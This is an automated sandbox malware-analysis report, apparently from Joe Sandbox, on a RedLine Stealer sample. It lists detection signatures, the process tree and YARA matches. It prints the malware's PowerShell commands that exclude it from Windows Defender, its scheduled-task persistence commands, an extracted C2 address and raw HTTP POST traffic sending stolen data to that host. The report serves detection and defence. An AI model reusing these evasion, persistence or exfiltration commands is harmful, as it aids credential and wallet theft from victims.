Windows Analysis Report
PZNfhfaj9O.exe

Overview

General Information

Sample name: PZNfhfaj9O.exe (renamed because original name is a hash value)
Original sample name: 01d452e81b85a3d399a247852f2f5004.exe
Analysis ID: 1532739
MD5: 01d452e81b85a3d399a247852f2f5004
SHA1: b1b5bb7edf69875726ea1c627fb0bbef6215143a
SHA256: 88fd2273dba726f8e93082eef548564c84ee1f3be9f69a7d02ef9a3ed7f8ea18
Tags: exe, RedLineStealer, user-abuse_ch

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PZNfhfaj9O.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
    • powershell.exe (PID: 4888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7376 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PZNfhfaj9O.exe (PID: 7196 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
    • PZNfhfaj9O.exe (PID: 7204 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • CiENBY.exe (PID: 7296 cmdline: C:\Users\user\AppData\Roaming\CiENBY.exe MD5: 01D452E81B85A3D399A247852F2F5004)
    • schtasks.exe (PID: 7636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CiENBY.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\CiENBY.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.58.80:55615"], "Bot Id": "cheat"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x14102:$a4: get_ScannedWallets
  • 0x2bf22:$a4: get_ScannedWallets
  • 0x43b42:$a4: get_ScannedWallets
  • 0x12f60:$a5: get_ScanTelegram
  • 0x2ad80:$a5: get_ScanTelegram
  • 0x429a0:$a5: get_ScanTelegram
  • 0x13d86:$a6: get_ScanGeckoBrowsersPaths
  • 0x2bba6:$a6: get_ScanGeckoBrowsersPaths
  • 0x437c6:$a6: get_ScanGeckoBrowsersPaths
  • 0x11ba2:$a7: <Processes>k__BackingField
  • 0x299c2:$a7: <Processes>k__BackingField
  • 0x415e2:$a7: <Processes>k__BackingField
  • 0xfab4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x278d4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x3f4f4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x114d6:$a9: <ScanFTP>k__BackingField
  • 0x292f6:$a9: <ScanFTP>k__BackingField
  • 0x40f16:$a9: <ScanFTP>k__BackingField
00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
0.2.PZNfhfaj9O.exe.3e42720.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.PZNfhfaj9O.exe.3e42720.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.2.PZNfhfaj9O.exe.3e42720.2.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.PZNfhfaj9O.exe.3e42720.2.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147ea:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147cb:$v2_6: GetUpdates
11.2.CiENBY.exe.3ef3958.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", ProcessId: 4888, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CiENBY.exe, ParentImage: C:\Users\user\AppData\Roaming\CiENBY.exe, ParentProcessId: 7296, ParentProcessName: CiENBY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", ProcessId: 7636, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", ProcessId: 6336, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", ProcessId: 4888, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", ProcessId: 6336, ProcessName: schtasks.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-13T21:02:18.471203+0200 | 2045000 | 1 | Malware Command and Control Activity Detected | 185.222.58.80 | 55615 | 192.168.2.4 | 49737 | TCP
                    2024-10-13T21:02:33.500680+0200 | 2045000 | 1 | Malware Command and Control Activity Detected | 185.222.58.80 | 55615 | 192.168.2.4 | 49742 | TCP
                    2024-10-13T21:02:24.121653+0200 | 2045001 | 1 | Malware Command and Control Activity Detected | 185.222.58.80 | 55615 | 192.168.2.4 | 49737 | TCP
                    2024-10-13T21:02:37.152967+0200 | 2045001 | 1 | Malware Command and Control Activity Detected | 185.222.58.80 | 55615 | 192.168.2.4 | 49742 | TCP
                    2024-10-13T21:02:18.069928+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:28.413704+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:23.674747+0200 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:33.726327+0200 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:39.127691+0200 | 2848200 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:27.747604+0200 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 185.222.58.80 | 55615 | TCP
                    2024-10-13T21:02:37.560860+0200 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 185.222.58.80 | 55615 | TCP

                    AV Detection

                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.80:55615"], "Bot Id": "cheat"}
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeReversingLabs: Detection: 60%
                    Source: PZNfhfaj9O.exeReversingLabs: Detection: 60%
                    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: PZNfhfaj9O.exeJoe Sandbox ML: detected
                    Source: PZNfhfaj9O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PZNfhfaj9O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: ACRONG~1.TXTntkrnlmp.pdbxx, source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: DQOrL.pdbSHA256 source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: Binary string: DQOrL.pdb source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 4x nop then jmp 0766F48Dh0_2_0766EF97
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 4x nop then jmp 0717E72Dh11_2_0717E237

                    Networking

                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.80:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.80:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49742 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49741 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.80:55615 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49742 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.80:55615 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49748 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49749 -> 185.222.58.80:55615
                    Source: Malware configuration extractorURLs: 185.222.58.80:55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.80:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.80:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.80:55615Content-Length: 930524Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.80:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.80:55615Content-Length: 930516Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.80:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.80:55615Content-Length: 930112Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.80:55615Content-Length: 930104Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: global traffic DNS traffic detected: DNS query: api.ip.sb
                    Source: unknown HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: text/xml; charset=utf-8
                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                        Host: 185.222.58.80:55615
                        Content-Length: 137
                        Expect: 100-continue
                        Accept-Encoding: gzip, deflate
                        Connection: Keep-Alive
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:5
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:55615
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.80:55615/
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: CiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmpDe
                    Source: CiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.co2/t/Re
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1958380307.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
